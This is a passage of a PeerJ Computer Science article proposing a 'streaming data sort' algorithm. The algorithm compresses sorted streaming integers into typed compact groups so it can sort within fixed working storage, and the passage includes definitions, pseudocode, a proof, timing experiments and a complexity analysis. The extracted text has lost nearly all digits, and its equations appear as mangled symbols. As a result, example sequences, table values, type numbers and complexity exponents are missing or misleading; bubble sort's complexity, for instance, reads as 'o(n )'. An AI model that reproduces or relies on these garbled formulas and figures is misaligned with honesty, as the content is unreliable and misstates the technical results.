small chunk of big data in the internal storage. after sorting, all sorted chunks are stored in the external storage and ( ) the merging phase combines all sorted chunks from the sorting phase into a single sorted list. recently, tarabyte sort (o’malley, ) has used three hadoop applications, namely, teragen, terasort, and teravalidate, to sort big data. this algorithm sorts billion data in s. this process is very fast, but it is expensive because it requires many processing units for sorting. kanza & yaari ( ) studied external sorting problems and designed multi-insertion sort and scs-merge v to v . the objective of these algorithms is to decrease the write cost of intermediate results of sorting. active sort (gantz & reinsel, ) is an algorithm that merges sorted chunks inside ssds and is applied with hadoop to reduce the number of reading and writing data. montres (laga et al., ), the algorithm designed for ssds, can reduce the read and write cost of i/o in a linear function. external sorting algorithms in the literature have focused on reducing the read and write cost in terms of the execution time for processing, but the storage issue for keeping big data is still ignored. liang et al. ( ) proposed a new algorithm, namely, b*-sort, which was designed on nvram and applied on a binary search tree structure. in addition, farnoud, yaakobi & bruck ( ) studied approximate sorting of streaming permuted data with limited storage; however, the result is not exactly sorted data, and only an approximate result is obtained when determining the data positions. conversely, the approximate positions of ordered data can be provided when using the values as inputs. elder & goh ( ) studied permutation sorting by finite and infinite stacks. although all possible permutations cannot be sorted, the exact order and values can be obtained. let n be the total streaming numbers to be sorted and m ≪ n be the limited size of working chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ storage. table summarizes the efficiency of various classic sorting methods and our proposed method (stream sort) in terms of seven characteristics: requiring extra storage, preserving the input appearance order, time complexity, space complexity, sorting streaming data, correct sorting order, and correct retrieved value by the sorted order. this article proposes a new algorithm called streaming data sort for sorting streaming data with limited storage size by using only a single central processing unit. the proposed algorithm can correctly and stably handle a streaming data size of at least . times larger than the size of the working storage. the following concerns are emphasized in this study. � all data must be in the exactly correct order after being sorted. no approximate and partial ordering is allowed in this study. � the time complexity of streaming data sort of all iterations is o(n). constraints in the stationary data environment, all classic sorting algorithms are based on the assumption that all numbers to be sorted must be entirely stored in the working storage of a computer during the sorting process. this implies that the whole data set cannot exceed the working storage size during the sorting process. figure illustrates storage constraint of the working storage in streaming data sort. however, in the streaming data environment, the data continuously flow into the computer one chunk at a time, and the number of incoming chunks is unknown in advance. if the size of the data chunk is larger than the working storage size, then the overflow will be permanently discarded from the computer. this makes the sorted result wrong. to make the study sufficiently feasible for analysis and practice, the following constraints are imposed. table comparison of sorting algorithms on streaming data. n is the total streaming numbers to be sorted and m ≪ n is the limited size of working storage. sorting algorithms requiring extra storage preserving input appearance order time complexity working space complexity applicable to streaming data correct order correct value bubble sort no yes o(n ) o(n) no yes yes selection sort no no o(n ) o(n) no yes yes insertion sort no yes o(n ) o(n) yes yes yes quick sort no no o(n ) o(n) no yes yes merge sort yes yes o(n lg n) o(n) no yes yes heap sort no no o(n lg n) o(n) no yes yes permutation sort (farnoud, yaakobi & bruck, ) no no o(n/ω(log n)) o(n) no yes yes permutation sort (elder & goh, ) yes yes n/a o(n) yes no no external sorting yes yes n/a o(n) yes yes yes streaming data sort no yes o(n) o(m) yes yes yes chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . the sorting process is performed by using only a fixed working storage of size m. this working storage is for storing the incoming data, previously sorted data, and other temporal data structures generated during the sorting process. no extra storage module is added during this period. the proposed sorting algorithm and the operating system are not stored in this working storage. . all numbers are integers. for floating numbers, they must first be transformed into integers. . at any time t, the sizes of previously sorted data in a compact form and the size of next incoming data chunk (h) must not exceed m. . the present incoming data chunk is completely discarded after being processed by the proposed sorting algorithm. . only four types of relation between any two temporal consecutive numbers di and di + are studied in this paper. the details and rationale of concentrating on these four types will be elaborated later. figure storage constraint. case for d ≤ m where all data must be in the storage. case for d ≫ m and d ≤ m + e where data overflow the storage. case for mwork = m + e, the constraint of this study. full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the second constraint is the main concern of this study. after sorting the first incoming data chunk, all numbers are captured in a compact form and all sorted numbers are completely discarded. this compact form is used in conjunction with the next incoming data chunk for sorting. to avoid a storage overflow obstruction, the fourth constraint must be presented. the last constraint is derived from real-world data sets. from the observation of real-world streaming data sets from the uci repository (dua & graff, ) such as the census income, diabetes -us hospitals, incident management process event log, pm . of five chinese cities, kegg metabolic relation network, beijing multi-site air quality, and buzz in social media, it is remarkable that most of the different values between two temporal consecutive numbers are between . and . on average. hence, only four types of relations between any two temporal consecutive numbers are the focus. the definition of each type will be given in the next section. definitions and notations definition the window at time t, denoted by w(t) = (d , d , …, dh), is a sequence of h ≤ m incoming numeric data at time t. definition the sorted window of w(t) at time t, denoted by w(t) = (w , w , …, wh | wi = dj, wi + = dk and wi; wiþ wðtÞ : wi < wiþ Þ, is a sequence of increasingly sorted numeric data of w(t). definition type- subsequence t = (wi, …, wi + l) � wðtÞ is a sequence such that ∀ wi, wi + ∈ t : |wi − wi + | = . an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to , namely, (| − |,| − |,| − |,| − |) = ( , , , ). definition type- subsequence t = (wi, …,wi+l) ⊆w (t) is a sequence such that ∀wi+a, wi+a+ ∈ t , ≤ a ≤ l− : |wi+a−wi+a+ | = when a is even and |wi+a−wi+a+ | = when a is odd. an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to either or , namely, (| – |, | – |, | – |, | – |) = ( , , , ). definition type- subsequence t = (wi, …,wi+l) ⊆w (t) is a sequence such that ∀wi+a, wi+a+ ∈ t , ≤ a ≤ l− : |wi+a−wi+a+ | = when a is even and |wi+a−wi+a+ | = when a is odd. an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to either or , namely, (| – |, | – |, | – |, | – |) = ( , , , ). definition type- subsequence t = (wi,…,wi+l) ⊆ w (t) is a sequence such that ∀wi,wi+ ∈ t : |wi−wi+ | = . an example of a type- sequence is ( , , , , ). the different value between any two adjacent numbers is equal to either or , namely, (| – |, | – |, | – |, | – |) = ( , , , ). during the sorting process by the proposed algorithm, it is necessary to identify the type of subsequence to be sorted first. given a subsequence (wi,…,wi+l) ∈w (t), the type of this subsequence can be easily identified as type-p by setting p ¼ wiþ þ wiþ − ðwi þ Þ ( ) chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ each already sorted subsequence (wi, …, wi + l) ∈ w (t) is compactly written in a form of (u, v)(p) where u = wi and v = wi + l are used during the sorting process to minimize the storage use. (u, v)(p) is named compact group p. any numeric data in between u and v are called removed data. these removed data are not considered and can be removed after the sorting process. for example, subsequence ( , , , , ) is compacted as ( , )( ); ( , , , , ) is compacted as ( , )( ); ( , , , ) is compacted as ( , )( ); and ( , , , ) is compacted as ( , )( ). note that a sequence w(t) may contain several compact groups and some single numbers. suppose w(t) = ( , , , , , , , , , , ). this sequence consists of the following subsequences ( , )( ), ( , )( ). thus, w(t) can be rewritten in another form of compact groups and a set of single numbers as w(t) = (( , )( ), , ( , )( ), ). however, it is possible to find another set of compact groups from w(t) as wðtÞ¼ ððð ; Þð Þ; ð ; Þð Þ; ð ; Þð Þ; Þ. obviously, different sets of compact groups for any w(t) use different storage sizes to store them. to distinguish between w(t) written in the original sequence of numbers and w(t) written in a form of compact groups having a set of single numbers, the notation q(t) is used instead of w(t) to denote a combination set of compact groups and single numbers. each compact group i in q(t) is denoted by qi. in fact, either each compact group or a single number in q(t) can be considered as an element of q(t). for example, if w(t) = ( , , , , , , , , , , ), then q(t) = (( , )( ), , ( , )( ), ) such that q = ( , ) ( ), q = ( , ) ( ). all removed data of compact group (u, v)(p) will be occasionally retrieved to obtain a complete sorted subsequence in order to involve the new incoming subsequence in the sorting process. hence, each retrieved number is denoted by ri to make it different from each input number wi during the sorting process. the retrieved sequence of (u, v) (p), denoted r((u, v)(p)), can be obtained by using the following rules. r ¼ u ( ) r þl ¼ v ( ) riþ ¼ ( ri þ for p ¼ ri þ ðri � r þ p � Þ mod for p ¼ ; ri þ for p ¼ ( ) to illustrate how to retrieve all numbers from a compact group, consider an example of sequence ( , , , ) represented by the compact group ( , )( ). the retrieved numbers of ( , )( ) can be computed as follows: since p = , r = , r = ( ) + (( ) − ( ) + ( ) − ) mod = , r = ( ) + (( ) − ( ) + ( ) − ) mod = , r = ( ) + (( ) − ( ) + ( ) − ) mod = , r = = v. accordingly, r ð ; Þð Þ � � ¼ ð ; ; ; Þ. concepts the size of each incoming sequence is assumed to be at most the size of working storage. to make the working storage available for storing the next incoming data chunk after sorting the current chunk, it is required to represent some sorted subsequent numbers in a form of a compact group. however, not all subsequent sorted numbers can be compacted. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the properties and concept of a compact group representation will be discussed next. the sorting process consists of the following three main steps. . transform the initial incoming sequence w( ) into a set of compact groups qi ∈ q ( ). . at time t, obtain the next incoming sequence and insert each number wi ∈ w (t) into the previous q(t − ) at the appropriate position. . if there exist any adjacent compact groups qi = (a,b) (a) and qi + = (c,d) (β) such that the retrieved sequences r((a,b)(a)) and r((c,d)(β)) satisfy one of the types of subsequences, then form a new compact group from the sequences of r((a,b)(a)) and r((c,d)(β)). steps and are iterated until there are no more incoming sequences. the details of each step will be discussed next. figure shows an example of how the proposed approximate sorting works. the storage size |mtot| is . the first incoming -number sequence, that is, ( , , , , , , , , , ), fills the whole storage. this sequence is sorted in an ascending order and forms a set q( ) = (( , )( ), , ( , )( ), ( , )( )), as shown in fig. a. the size of the storage used is decreased to . the second incoming sequence ( , , ) is inserted into some compact groups in q( ) to obtain q( ) = (( , )( ), , ( , )( ), , ( , )( )), as shown in fig. b. the size of the storage used after the second incoming sequence is increased to . the third incoming sequence ( , ) is separately grouped with ( , )( ) and ( , )( ) from the previous q( ) to make a new q( ) = (( , )( ), , ( , )( ), , ( , )( )). observe that the compact group ( , )( ) can be grouped with the single number to make ( , )( ). therefore, q( ) = (( , )( ), , ( , )( ), ( , )( )). the fourth incoming sequence ( , , ) is possibly and separately grouped with ( , )( ), ( , )( ), and ( , )( ) in q( ) to obtain q( ) = (( , )( ), , ( , )( )). the last incoming sequence ( , ) is possibly and separately grouped with ( , )( ), , ( , )( ) in q( ) to obtain q( ) = (( , )( )). proposed algorithm the proposed sorting algorithm is composed of the following two major steps. these steps are based on the constraints previously imposed in constraints section. . obtain the first input number sequence and sort the number in an ascending order. then, create q( ), a set of compact groups and a set of a single number. . at time t, obtain the next set of number sequences and insert the numbers into q(t − ) to create the next q(t). . repeat step until there are no more new incoming sequences. the deils of steps and will be discussed in the following sections. creating compact groups there are four types of compact groups. to identify the type of compact group from a number sequence, four counters c , c , c , and c for type- , type- , type- , and type- , respectively, are employed. let s(i) be the status condition of type-i. the value of s(i) is defined as follows. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð Þ ¼ wkþi � wkþi� ¼ for � i � m otherwise: � definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð Þ ¼ ðwkþi� � wkÞ mod þ ¼ wkþi � wkþi� for � i � m otherwise: � figure an example of streaming data sort. the sorting steps are illustrated in subfigures (a), (b), (c), (d) and (e). full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m<h is a constant defined by: sð Þ ¼ ðwkþi� � wk þ Þ mod ¼ wkþi � wkþi� for � i � m otherwise: � definition type- status condition s( ) of a datum wk + i and its neighbors in a type- subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð Þ ¼ wkþi � wkþi� ¼ for � i � m otherwise: � the notations in this paper are given in table . q(t)||s|| c denotes orderly concatenating q(t), s, c according to the sorted order of all elements in w(t). the quantity of removed data of type- is greater than those of the other types. the difference of the first and the last data of a type- compact group is larger than the differences in the other types. to greatly reduce and control the storage size, the sequences of types and are detected before the sequences of types and . suppose the following sequence ( , , , , ) is given. if types and are considered before types and , then the given sequence is compacted as , ( , )( ), which requires units of storage to store numbers , , , . however, if types and are considered before types and , then the given sequence is compacted as ( , )( ), , , which requires units of storage to store numbers , , , , . theorem if p ¼ arg max �i� ðciÞ, then p denotes the correct type of the compact group. proof: suppose the sorted sequence is w(t) = (w , w , …, wh). we consider each type of compact group. let s(i)t be the status condition of type-i at time t and t (i) = (s(i) , s (i) , …, s (i) h ) be the sequence of s(i)t . there are four cases to be investigated. table notations in streaming data sort. notations short definitions examples di the i th incoming datum − , , (d ,d ,d ,…) sequence of streaming data (− , , ,…) h window size at iteration t , , , wi the i th member in a window , , w(t) unsorted window at iteration t ( , , , ,…) w(t) sorted window at iteration t ( , , , ,…) p type of sub-sequence , , , tp type-p sub-sequence ( , , , , , ) (u, v)(p) type-p compact group ( , )( ) ri the i th retrieved number , , , , , r((u, v)(p)) retrieved sequence of (u, v)(p) ( , , , , , ) s(i) status condition of type-i , qi the i th compact group ( , )( ), ( , )( ) s set of single numbers { , } c set of compact groups {( , )( ), ( , )( )} q(t) combining set of c and s at iteration t {( , )( ), , , ( , )( )} chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c . case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c . case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c . case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c .▪ chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ inserting numbers into the combination set of compact groups after creating the first combination set of compact group q( ) and obtaining a new incoming sequence, the current compact groups must be updated according to the number in the incoming sequence. there are seven possible cases where a new incoming number can be inserted into any compact group or in between a compact group and a single number. let the a new incoming number da is located according to each case as follows. q(t) is the set of combinations of compact groups and a set of single numbers at time t. case : da is at the front of q (t). case : da is at the rear of q (t). case : da is in a compact group (uj, vj) (p). case : da is in between two compact groups (uj, vj) (pj) and (uk, vk) (pk). case : da is in between a single number wj and a compact group (uk, vk) (pk). case : da is in between a compact group (uj, vj) (pj) and a single number wk. case : da is in between two single numbers wj and wj + . the details of each case and the insertion steps are in given in algorithm . experimental results and discussion three issues are discussed in this section. the first issue illustrates the snapshot of sorting outcomes as the results of incoming data chunks, current compact groups of different types, and sets of single numbers. the second issue discusses the relation between the sorting time and the number of streaming numbers. the third issue shows how the size of working storage changes during the sorting process. sorting examples the proposed algorithms are implemented in matlab r a. the computing results are run on . ghz intel core i and gb of mhz ram with the windows platform. to illustrate how the proposed algorithm works, three experiments were conducted by using a set of single integers ranging from to . these numbers were randomly permuted to produce three different experimental data sets. the total size of storage is assumed to have only working addresses. forty of them are used for storing temporary data generated during the sorting process, which includes wðtÞ, w(t), and q(t) at different times. the rest of storage is for storing some variables in the sorting program. to illustrate the continuous results during the sorting process, three data sets in the experiment were generated from three permutations of integer numbers from to to avoid any duplication. these permuted numbers are sliced into a set of input chunks of at most numbers in each chunk. let mtotj j be the total size of the working storage, which is equal to in the experiment. the experimental results are shown in fig. , where the x-axis represents each wi in w (t) and q(t) and the y-axis represents the time line of iterations. each datum wi is represented by ×. each type of compact group in q (t) is denoted by a solid line with a specific color as follows. type- is denoted by gray line. type- is denoted by blue line. type- is denoted by green line. type- is denoted by red line. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a single number in the compact window is represented by •. in the first data set, there are numbers entering the process at the starting time. after being grouped by algorithm , the result appears in time step t = (at the line above the bottom line in fig. a. there are four compact groups of type- , two compact groups of type- , three compact groups of type- , and nine single numbers. also, at time t = , there are four new incoming numbers, each of which is represented by ×. algorithm sorts algorithm creating compact groups. input: a sorted sequence w(t) = (wk, wk+ , …, wk+h) of length h at time t. output: a combination of a set of compact groups and a set of single numbers. . j = k. . s = Ø. /* set of single numbers */ . c = Ø. /* set of compact groups */ . q(t) = Ø. . for l = to do /* packing order types , before , */ . c = c = c = c = . . if |wk −wk+ | > then . s = s∪{wk}. . j = k+ . . endif . for i = k+ to k+h− do . if |wi−wi+ | ≤ then . set the values of s( ), s( ), s( ), s( ) by definitions – . . cl = cl +s (l). . c −l = c −l +s ( −l). . else . if j = i then . s = s∪{wj}. /* single number */ . j = i + . . else . p = arg maxi fl; −lg (ci). /* compact types */ . create a compact group (wj, wi) (p). . c = c∪{(wj, wi) (p)}. . c = c = c = c = . . j = i + . . endif . endif . q(t) = q(t)||s||c. . endfor . endfor chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm inserting dα into q(t). input: ( ) set q(t). ( ) a new number da. output: a new q(t+ ). . identify the case of insertion for da. . case: . : if the first element of q(t) is (u , v ) (p ) then . let u be the retrieved (u , v ) (p ) by using eqs. ( ), ( ) and ( ). . else . put d in u. . endif . use algorithm with da and u to generate a new set of elements. . endcase . : if the last element of q(t) is (um, vm) (pm) then . let u be the retrieved (um, vm) (pm) by using eqs. ( ), ( ) and ( ). . else . put dm in u. . endif . use algorithm with da and u to generate a new set of elements. . endcase . : let u be the retrieved (um, vm) (pm) by using eqs. ( ), ( ) and ( ). . use algorithm with da and u to generate a new set of elements. . endcase . : let u be the retrieved (uj, vj) (pj) by using eqs. ( ), ( ) and ( ). . let v be the retrieved (uk, vk) (pk) by using eqs. ( ), ( ) and ( ). . use algorithm with da, u and v to generate a new set of elements. . endcase . : let u be the retrieved (uk, vk) (pk) by using eqs. ( ), ( ) and ( ). . use algorithm with da, wj and u to generate a new set of elements. . endcase . : let u be the retrieved (uj, vj) (pj) by using eqs. ( ), ( ) and ( ). . use algorithm with da, u and wk to generate a new set of elements. . endcase . : use algorithm with da, wj and wk to generate a new set of elements. . endcase . repeat . use algorithm with the new set of elements and the unpacked element next to the new set next to the new set of elements to generate the next new set of elements in q(t). . until no more new elements. . rename q(t) as q(t+ ). . endcase chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ all incoming numbers appearing in various chunks within only time steps, whereas it takes and time steps for the second and the last data sets, respectively. execution time vs working storage size in this experiment, the relation between the total numbers to be sorted and the sorting time was investigated. the total storage, mtot, is partitioned into two portions. the first portion, mprog, is for the sorting program. the size of mprog is fixed throughout the sorting process. the second portion, mwork, is the working storage for storing all compact groups, sets of single numbers, and other relevant variables occurring during in the sorting algorithm. since the sorting time directly depends upon the size of mwork, the size of mwork is thus set as a function of the total numbers to be sorted. let n ≫|mwork| be the total figure snapshots of sorting results from three different permuted data sets, each of which contains numbers. (a) the time steps of the sorting result of data set . (b) the time steps of the sorting result of data set . (c) the time steps of the sorting result of data set . full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ numbers to be sorted. all numbers to be sorted flow gradually and continuously into the working storage one chunk at an initial time. to investigate the execution time of the sorting process with respect to the quantity of numbers and |mwork|, the size of mwork is set in terms of n as follows. jmworkj ¼ g � n ( ) where γ ∈ { . , . , . , . } and n ∈ { , , , }. table summarizes the proposed sorting algorithm time of different quantities of incoming numbers with respect to the different sizes of the working memory. the incoming numbers were randomly generated and permuted. no duplicated numbers appear in the data sets. to visualize the trend of the sorting time vs the size of data sets, fig. shows the log-scaled trend of each data set. there are four lines in blue, red, yellow, and purple representing different sizes of mwork. note that the sorting time of each data set linearly figure log-scaled sorting execution time in seconds for different sizes of working storage n = , , and . full-size doi: . /peerj-cs. /fig- table sorting execution time of the proposed algorithm with respect to size of working storage. n execution time (s) γ = % γ = % γ = % γ = % . . . . . . . . . . . . . . . , . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ increases. then, the experiment has a linear polynomial time complexity of o(n). table summarizes the time of external sorting of different quantities of incoming numbers with respect to the different sizes of buffer. the execution time of proposed sorting algorithm is approximately . times faster than the execution time of external sorting at a million data when storage size is limited to %. furthermore, the proposed algorithm run on gb of numeric data takes about . days. fluctuation of compact groups and single number sets since the proposed sorting algorithm is designed to cope with a streaming data environment where the set of numbers to be sorted can overflow the working storage and the chunks of numbers gradually flow into the working storage, there are three interesting behavioral periods concerning the number of compact groups and sets of single numbers created during the sorting process. it is remarkable that the number of compact groups and sets of single numbers increase during the beginning period due to random values of incoming numbers. the length of beginning period depends upon the random sequence of numbers, which is unpredictable. after the beginning period, some new incoming numbers may fall into the existing compact groups and some of them may form new compact groups with some sets of single numbers. some existing compact groups can be merged with new compact groups created from some sets of single numbers into new compact groups. these conditions make the number of compact groups almost stable for some period of time. in the last period, those new incoming numbers obviously fall to combine with the existing compact groups. some sequences of compact groups are possibly merged into new compact groups with more elements in the groups. thus, the number of compact groups decreases until there is one compact group that contains all sorted numbers. figure illustrates the fluctuation of compact groups with sets of single numbers vs the time steps for different sizes of working storage. during the sorting process, the number of compact groups and sets of single numbers increases and decreases. the fluctuation of used and unused areas of working storage of the results in fig. is summarized in fig. . notice that the proposed algorithm can reduce the working space to % of the data size. in the other words, the working space of the proposed algorithm is % of the data size. comparison of storage size used and correctness of sorted order regardless of the sorting types, either exact sort or approximate sort, the order of each number in the sorted list must be correct according to the value of each number for table sorting execution time of external sorting with respect to buffer size. n execution time (s) buffer = % buffer = % buffer = % buffer = % . . . . . . . . . . . . , . , . , . , . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure snapshot of fluctuation of unused area of working storage at a million data during the sorting period for different sizes of working storage. full-size doi: . /peerj-cs. /fig- figure snapshot of fluctuation of compact groups and sets of single numbers at a million data during the sorting period for different sizes of working storage. full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ both ascending and descending sorts. if it is not so, the sorted list is useless in any applications. to verify the efficiency and the accurate order of sorted numbers as the result of proposed streaming data sort in a streaming data environment with limited storage size, the result was compared with the result of approximate sorting algorithm (farnoud, yaakobi & bruck, ) capable of handling streaming data, and external sorting. the following set of numbers was experimented: { , , , , , , , , , , , , , , , , , , , }. in order to simulate streaming data, the set of numbers was decomposed into several consecutive chunks. the first incoming chunk contains nine numbers. the other following chunks contain only one number. two issues concerning the change of storage size during the sorting process and the wrong sorted order were recorded in the experiment. since streaming data sort algorithm uses only one working storage of fixed size throughout the sorting process, there is no change of storage size for this algorithm. but in case of approximate sorting and external sorting algorithms, both of them require working storage of fixed size and also external storage of variable size. hence, the change of storage size only occurs in the external storage. figure snapshots the storage size change at each time. mwork is a constant denoting the fixed size of working storage. the size of external storage is expandable according to the amount of temporary data generated during the sorting algorithms. it is remarkable that the proposed streaming data sort does not require any space in the external storage. only working storage space alone is enough to complete the sorting figure comparison of storage size change as the results of sorting a set of streaming data by the proposed streaming data sort algorithm, approximate sorting (farnoud, yaakobi & bruck, ) algorithm and external sorting. full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ process. but both approximate sorting and external sorting need some additional spaces in the external storage. these spaces keep increasing when there are more incoming numbers to be sorted. the sorted order of all numbers obtained from streaming data sort is perfectly correct. but the sorted orders of numbers , , , obtained from approximate sorting are not correct. although the sorted order obtained from external sorting is perfectly correct, this algorithm requires a large size of external storage which is impractical for streaming data environment. time complexity analysis there are two main phases in the sorting process. the first phase is to sort the first incoming chunk of numbers to obtain the first set of compact groups as well as sets of single numbers. the second phase is to sort the consequent chunks with the existing compact groups and single numbers. let h ≤ |mwork| be the size of each input chunk. the time complexity of each phase is as follows. phase : the operation of this phase is in algorithm . obtaining h numbers takes o(h). these h numbers must be sorted to create compact groups and sets of single numbers. the time to sort h numbers is o(h log (h)). after sorting, the time to create compact groups and sets of single numbers takes o(h). thus, the time of this phase is o(h) + o(h log(h)) + o(h) = o(h log(h)). phase : from algorithm , all compact groups at any time are in set c, and all single numbers are in set s. the time complexity of this phase can be analyzed from algorithm . there are seven cases to be identified for inserting a new number da at step . the identifying time takes o(|c|) + o(|s|) ¼ maxðoðjcjÞ; oðjsjÞÞ. then, applying eqs. ( ), ( ) and ( ) to retrieve the numbers from a compact group takes o( ). after retrieval of the numbers, algorithm is applied to create a new compact group and a set of single numbers with the new incoming da. this step takes at most o(h). at steps – , algorithm is repeatedly applied to update sets c and s. this takes at most o(h×|c|) + o(|s|). since |c| ≤ h and |s| ≤ h, the time complexity of steps – is o(h ). thus, phase takes max(o(|c|), o(|s|)) + o( ) + o(h) + o(h ) = o(h ) for each da. if there are in total n numbers to be sorted, then the time complexity is o(h log(h)) + o((n − h) × h ) = o(nh ). however, h is a constant. hence, the time complexity of the sorting process is o(n). storage usage analysis the behavior of storage usage is in the form of a capsized bell shape, as shown in fig. . the descriptive rationale behind this behavior was briefly provided in fluctuation of compact groups and single number sets section. this section will theoretically analyze this behavior based on the probability of all seven cases for a compact group. suppose there are n total streaming numbers to be sorted. all incoming n numbers are assumed to be randomly permuted and partitioned into nh input chunks of size h each. let ni be the numbers in the ith input data chunk. after obtaining the first input data chunk, the probability of each case for the next new incoming number da for any compact group qi is as follows. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ case : da is at the front of qi. the probability of case is calculated by the probability of picking da from n − n and the probability of having da in the next input chunk. the probability of picking da from n − n numbers is n�n . however, if da is the next new incoming number, then da must be in the next input data chunk. the probability that da is in the next input chunk is n h� . thus, the probability of case is as follows. p ¼ n � n � n h � ( ) case : da is at the rear of qi. the probability of case can be analyzed as that of case . case : da is in a compact group qi, types , , and are compact groups only. if qi is a type- compact group, then the probability that da is in qi is �jqij � � n�n , where |qi| represents the numbers compacted in qi. if qi is a type- compact group, then the probability that da is in qi is �jqij � � n�n . if qi is a type- compact group, then the probability that da is 